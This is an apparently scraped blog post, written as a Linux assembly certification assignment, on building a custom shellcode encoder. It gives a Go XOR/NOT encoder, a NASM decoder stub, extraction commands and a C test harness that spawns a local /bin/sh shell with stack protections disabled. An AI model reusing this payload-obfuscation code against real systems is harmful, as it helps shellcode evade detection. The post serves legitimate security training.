![\"\"](\"https:\/\/mosunit.com\/wp-content\/uploads\/2020\/08\/1-2.png\")
<\/figure>\n\n\n\nTo encode the raw shellcode, I have written a script Go. The Go script has been hardcoded with execve<\/em> shellcode. The shellcode uses exeve syscall to spawn shell(\/bin\/sh) on local system. However, the hardcoded shellcode can be swapped with any other shellcode to get an encoded payload. For this, I have modified the original Commandlinefu<\/a> as mentioned in previous post to convert shellcode in to an output which can be directly embedded in my Go code. The updated command is also published at Commandlinefu<\/a><\/p>\n\n\n\n Following is the Go code:<\/p>\n\n\n\n Once the code is run, we get the encoded shellcode. <\/p>\n\n\n\n So, we are done with the encoding part. We have our encoded shellcode ready, which is nothing but gibberish instructions. <\/p>\n\n\n\n Our next task is to write a decoder stub that decodes this encoded shellcode at runtime to transform it into original raw shellcode. The steps to be followed will be reverse of what we did in the encoding part.<\/p>\n\n\n\n The assembly code is as follows:<\/p>\n\n\n\n Let me explain what is going on here:<\/p>\n\n\n\n Let’s assemble, link and extract the shellcode. The shellcode is extracted using this Commandlinefu<\/a>.<\/p>\n\n\n\n We have the shellcode with us. Let’s put this in our skeleton C program to check if this runs successfully.<\/p>\n\n\n\n The final step is to compile this using gcc and then run it. We need to add There we have it ! Our encoded shellcode was decoded successfully at runtime and then executed. <\/p>\n\n\n\n This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https:\/\/www.pentesteracademy.com\/course?id=3<\/a><\/p>\n\n\n\n Student ID: PA-16521<\/p>\n\n\n\n\/*\nTool:\t\t\t\tCustom Encoder\nEncoding Scheme:\tXOR with 0xaa -> Increment by 1 -> NOT -> XOR with 0xaa\nAuthor:\t\t\t\tMohit Suyal (@mosunit)\nStudent ID:\t\t\tPA-16521\nBlog:\t\t\t\thttps:\/\/mosunit.com\n*\/\n\npackage main\n\nimport (\n\t\"fmt\"\n)\n\nfunc main() {\n\n\t\/\/ exeve_sh shellcode - spawns shell(\/bin\/sh) on localhost\n\tShellcode := []byte{0x31, 0xc0, 0x50, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3, 0x50, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80}\n\n\t\/\/ key for XOR operation\n\tvar key byte = 0xaa\n\n\t\/\/ create a slice to store encoded shellcode\n\tEncodedShellcode := make([]byte, 25)\n\n\t\/\/ encode operation\n\tfor i := range Shellcode {\n\n\t\tXorFirst := Shellcode[i] ^ key\n\t\tIncrement := XorFirst + 1\n\t\tNot := ^Increment\n\t\tXorSecond := Not ^ key\n\t\tEncodedShellcode[i] = XorSecond\n\t}\n\n\t\/\/ format the encoded code - to be included in shellcode program\n\tfor i := range EncodedShellcode {\n\t\t\/\/ check the index value to match the last element of the slice\n\t\t\/\/ this if statement is true for all index values except the last\n\t\tif i != len(EncodedShellcode)-1 {\n\t\t\t\/\/ Check if the hex coversion of slice element will be less than 2 digits; append an additional \"0\", if true\n\t\t\tif EncodedShellcode[i] < 16 {\n\t\t\t\tfmt.Printf(\"0x0%x,\", EncodedShellcode[i])\n\t\t\t} else {\n\t\t\t\tfmt.Printf(\"0x%x,\", EncodedShellcode[i])\n\t\t\t}\n\t\t} else {\n\t\t\tif EncodedShellcode[i] < 16 {\n\t\t\t\tfmt.Printf(\"0x0%x\", EncodedShellcode[i])\n\t\t\t} else {\n\t\t\t\tfmt.Printf(\"0x%x\", EncodedShellcode[i])\n\t\t\t}\n\t\t}\n\t}\n}\n<\/pre>\n\n\n\nPS E:\\<snipped>\\SLAE\\assignment-4> go run .\\custom_encoder.go\n0xc9,0x3e,0xae,0x96,0x90,0xd3,0x8f,0x96,0x96,0xd3,0xd3,0x9c,0x91,0x71,0x1f,0xae,0x71,0x1c,0xaf,0x71,0x19,0x4e,0xf7,0x3d,0x7e<\/pre>\n\n\n\n
The Decoder !<\/h2>\n\n\n\n
![\"\"](\"https:\/\/mosunit.com\/wp-content\/uploads\/2020\/08\/2.png\")
<\/figure>\n\n\n\n;Tool: Custom Encoder\n;ncoding Scheme: XOR with 0xaa -> Increment by 1 -> NOT -> XOR with 0xaa\n;uthor: Mohit Suyal (@mosunit)\n;Student ID: PA-16521\n;Blog: https:\/\/mosunit.com\n\nglobal _start\n\nsection .text\n\n_start:\n\njmp short shellcode\n\ndecoder:\n ; retrive address of encoded shellcode using jmp-call-pop technique\n pop esi\n\ndecode_stub:\n ; first operation - XOR with 0xaa\n xor byte [esi], 0xaa\n\n ; jump when xored with dummy byte - signifies end of shellcode\n ; pass the control for execution when complete shellcode is decoded\n jz encoded_shellcode\n\n ; second operatino - NOT\n not byte [esi]\n\n ; third operation - decrement by 1 byte\n dec byte [esi]\n\n ; fourth operation - XOR with 0xaa\n xor byte [esi], 0xaa\n\n ; counter to increament to next byte in shellcode\n inc esi\n\n ; decode loop\n jmp short decode_stub\n\n\nshellcode:\n call decoder\n\n ; encoded shellcode\n ; shellcode ends with dummy byte 0xaa - signifies end of shellcode\n encoded_shellcode: db 0xc9,0x3e,0xae,0x96,0x90,0xd3,0x8f,0x96,0x96,0xd3,0xd3,0x9c,0x91,0x71,0x1f,0xae,0x71,0x1c,0xaf,0x71,0x19,0x4e,0xf7,0x3d,0x7e,0xaa\n<\/pre>\n\n\n\n
root@kali:~\/slae\/assignments\/assignment-4# nasm -elf32 -o custom_encoder custom_encoder.nasm\nroot@kali:~\/slae\/assignments\/assignment-4# ld -o custom_encoder custom_encoder.o\nroot@kali:~\/slae\/assignments\/assignment-4# file custom_encoder\ncustom_encoder: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped\nroot@kali:~\/slae\/assignments\/assignment-4# objdump -d custom_encoder |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/\"\/'|sed 's\/$\/\"\/g'\n\"\\xeb\\x10\\x5e\\x80\\x36\\xaa\\x74\\x0f\\xf6\\x16\\xfe\\x0e\\x80\\x36\\xaa\\x46\\xeb\\xf1\\xe8\\xeb\\xff\\xff\\xff\\xc9\\x3e\\xae\\x96\\x90\\xd3\\x8f\\x96\\x96\\xd3\\xd3\\x9c\\x91\\x71\\x1f\\xae\\x71\\x1c\\xaf\\x71\\x19\\x4e\\xf7\\x3d\\x7e\\xaa\"<\/pre>\n\n\n\n
#include <stdio.h>\n#include <string.h>\n\nunsigned char code[] = \\\n\"\\xeb\\x10\\x5e\\x80\\x36\\xaa\\x74\\x0f\\xf6\\x16\\xfe\\x0e\\x80\\x36\\xaa\\x46\\xeb\\xf1\\xe8\\xeb\\xff\\xff\\xff\\xc9\\x3e\\xae\\x96\\x90\\xd3\\x8f\\x96\\x96\\xd3\\xd3\\x9c\\x91\\x71\\x1f\\xae\\x71\\x1c\\xaf\\x71\\x19\\x4e\\xf7\\x3d\\x7e\\xaa\";\n\nmain()\n\n{\n printf(\"Shellcode length: %d\\n\", strlen(code));\n int (*ret)() = (int(*)())code;\n ret();\n}\n<\/pre>\n\n\n\nfno-stack-protector<\/code> to unprotect the stack and execstack<\/code> to make the stack executable. <\/p>\n\n\n\nroot@kali:~\/slae\/assignments\/assignment-4# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\nshellcode.c:7:1: warning: return type defaults to \u2018int\u2019 [-Wimplicit-int]\n 7 | main()\n | ^~~~\nroot@kali:~\/slae\/assignments\/assignment-4# .\/shellcode\nShellcode length: 49\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# ps\n PID TTY TIME CMD\n 1075 pts\/3 00:00:00 bash\n 8840 pts\/3 00:00:00 sh\n 8848 pts\/3 00:00:00 ps\n#\n<\/pre>\n\n\n\n